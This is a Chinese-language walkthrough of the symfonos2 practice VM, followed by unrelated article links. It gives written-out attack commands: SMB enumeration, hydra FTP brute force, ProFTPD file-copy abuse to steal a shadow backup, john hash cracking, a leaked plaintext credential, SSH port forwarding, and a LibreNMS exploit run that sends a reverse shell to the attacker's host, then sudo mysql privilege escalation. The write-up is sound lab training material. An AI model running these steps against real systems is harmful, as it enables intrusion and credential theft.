当前位置: 首页 > news >正文

从hash碰撞到ssh端口转发渗透内网:靶机练习之symfonos2

信息搜集

nmap -sn 192.168.8.0/24

nmap -sT --min-rate 10000 192.168.8.7 -p

重点关注445和21端口,一个smb一个ftp,这两个都是有关存储的

nmap -sT -sC -sV -O 192.168.8.7 -p21,22,80,139,445 -oA ports

smb渗透

enum4linux 192.168.8.7 -e US

有个匿名登录

smbclient //192.168.8.7/anonymous

有一个日志文件

mget logs.txt

泄露文件分析

存储了一个shadow.bak密码文件到备份文件夹

泄露了一个ftp用户名

ftp渗透

之前端口扫描的时候探测到了,ftp的版本

ftp爆破

之前文件泄露中拿到了一个文件名,尝试进行爆破,这个等待时间较长

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt -f ftp://192.168.8.7

ps:第一次打的时候爆破出来了,第二次耗了两个小时才出来,这个应该不是常规路径,不推荐

未授权文件复制漏洞利用

有历史漏洞,但是目录没有写入权限,没有办法直接反弹shell

尝试文件复制,把shadow.bak文件复制到smb共享文件夹中


ftp> site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp> site cpto /home/aeolus/share/shadow.bak 250 Copy successful

下载shadow文件

hash碰撞

john pass.hash --wordlist=/usr/share/wordlists/rockyou.txt

拿到第一个凭证

aeolus$sergioteamo

内网渗透

ss -ntlp

发现内网还有一个8080端口服务

ssh内网端口转发

ssh -L 8080:127.0.0.1:8080 aeolus@192.168.8.7 -N -L 参数详解 格式:-L [本地地址:]本地端口:目标地址:目标端口 -L 8080:127.0.0.1:8080 ↑ ↑ ↑ 本地端口 目标地址 目标端口 - 8080(本地端口)— 你本机监听 8080 端口 - 127.0.0.1(目标地址)— 这是相对于远程主机的地址,即远程主机的 localhost - 8080(目标端口)— 远程主机上 127.0.0.1:8080 的服务端口 数据流向 你的电脑:8080 ──SSH加密隧道──> 192.168.8.7 ──> 192.168.8.7:8080 (本机服务) 当你访问 http://127.0.0.1:8080 时,流量会被 SSH 加密后转发到 192.168.8.7,然后由远程主机访问它自己的 127.0.0.1:8080。 典型使用场景 远程主机 192.168.8.7 上运行了一个只监听 localhost 的服务(如 Web 管理面板、数据库、API 服务),这个服务不对外网暴露。通过这条命令,你可以安全地在你本地直接访问该服务,就像它在本地运行一样。 -N 的作用 不加 -N 的话,SSH 连接后会给你一个远程 shell。加上 -N 表示"不执行远程命令",连接建立后终端会挂起,只维持隧道,不打开 shell。适合单纯做端口转发时使用。

发现是一个librenms服务

librenms渗透

尝试用刚才获取的凭证,成功登录后台

查找漏洞利用

searchsploit librenms

查看利用方式,发现需要登录的cookie

burp登录抓包,拿到cookie

python2 47044.py http://127.0.0.1:8080/ "PHPSESSID=sr2acfp9qithdfben944bgrmh6; XSRF-TOKEN=eyJpdiI6ImZJWUtCRjB2Q3AwM1UzNWJPTWJjbnc9PSIsInZhbHVlIjoiVzRzOHkzZ1wvUDNMcWticUl1REdGMDUxTmVqRTlGT2U0cCtFT1JZTTNkMFh5T0V5NWtOQTRyR291TkI5K1NXVDB1Ukoyb0pDQVUrZG1MQnBKaStcLzlkZz09IiwibWFjIjoiOTEzODY1ZTJlMjRhZGE0ODIzZWYwM2Y4YjE2MDNjMWU1MTMxNTBjNDFkMTE5NWRjOTVjM2QxNTVmMTMzMTg4ZiJ9; librenms_session=eyJpdiI6IjF0OVZPSUtsOU5pSnNMMEl5eld2RWc9PSIsInZhbHVlIjoiOWoxSFM2cmV4Mm13S0pXRzd1RG55T1duc2srNEk0VGtrUDRqNlFKZmtyWVpLRlQ1Zk0zS2hlXC85RWNpd1wva0RVRThZdVJiazFZWTltRmpFeTdkeGJLUT09IiwibWFjIjoiZjM5ZTk5ZTQyOGRhNDEwNWZiNGYyMTc0ZjQyMjc3NmRkOTk0MGY1YmMyYzc2MDExMWEwN2U3ZmQxNWQ4YzM5YiJ9" 192.168.8.11 4444

启动msf

配置参数

成功拿到shell

sudo提权

sudo -l

可以免密执行sudo权限的mysql

GTFOBINs提权

成功提权

补充一个兔子洞

内网还有一个邮件服务,exim 4.89

有一个本地提权漏洞,似乎无法成功利用

小结一下

靶机整理难度不高,主要是针对smb泄露文件,展开两条思路进一步攻击;一个是用户名aeolus去爆破;一个是shadow备份文件和共享文件路径泄露,通过proftpd文件复制漏洞,拿到shadow备份文件,进行hash碰撞;后面的内网渗透,ssh端口转发,思路都非常流畅,是一台很好的练手的靶机
http://www.jsqmd.com/news/1252537/

相关文章:

  • C++二维数组深度解析:从内存模型到实战应用
  • BQ41Z50 BMS芯片深度解析:从核心保护到智能充电与电量计量
  • C++异常处理:从原理到实践,掌握健壮代码的关键
  • 优秀项目经理的22件大事与4项核心能力:贯穿施工全流程的管理之道
  • CDU冷分配单元阀:原理、关键数据与典型应用 - 行业深度分析
  • AI元人文:欲望、客观性与自我感知的三维纠缠治理
  • 内网终端主动告警体系搭建思路,实现风险自动识别与应急处置
  • 2026毕业生必备:五大智能论文降重工具实测
  • 人事 Eva:Moka AI 的人事 AI 同事,释放 HR 的战略价值空间
  • 现代C++项目模板:CMake构建、工具链集成与跨平台开发实践
  • 基于YOLOv5的工地安全帽实时检测系统实践
  • AI写作的局限性与真人创作优势分析
  • C++日历计算器实现:从日期算法到工程实践
  • 基于LLM多智能体的AI量化交易系统设计与实践
  • C++17 std::variant:类型安全联合体的原理、应用与性能优化
  • 2026 年现阶段建德比较好的建筑外墙硬泡聚氨酯喷涂施工电话生产厂家找哪家,外墙保暖省钱秘籍:聚氨酯喷涂的真相 - 行业推荐官【认证】
  • C++ STL容器核心解析:从底层原理到性能优化实战
  • MSP430G2x53-Q1的ADC与I/O复用:低功耗数据采集系统设计指南
  • Llama2架构改进与微调实战指南
  • 专科生AI降重工具对比:千笔AI与PaperRed实测
  • 医疗NLP核心技术解析与应用实践
  • Raft协议实现数据的分布式存储
  • 大模型Agent推理模式:核心技术解析与面试指南
  • MSP430数字I/O寄存器深度解析:从基础配置到中断与端口映射实战
  • BQ41Z50数据闪存配置实战:GPIO、保护与熔断机制详解
  • YOLOv10在精准农业杂草检测中的应用与实践
  • 半监督学习在网络入侵检测系统中的应用实践
  • C++算法性能优化终极指南:188个核心实践与工程心法
  • 从SMPL模型旋转矩阵提取临床关节角度的原理与Python实现
  • 曲面Pattern缺陷检测技术与工程实践全解析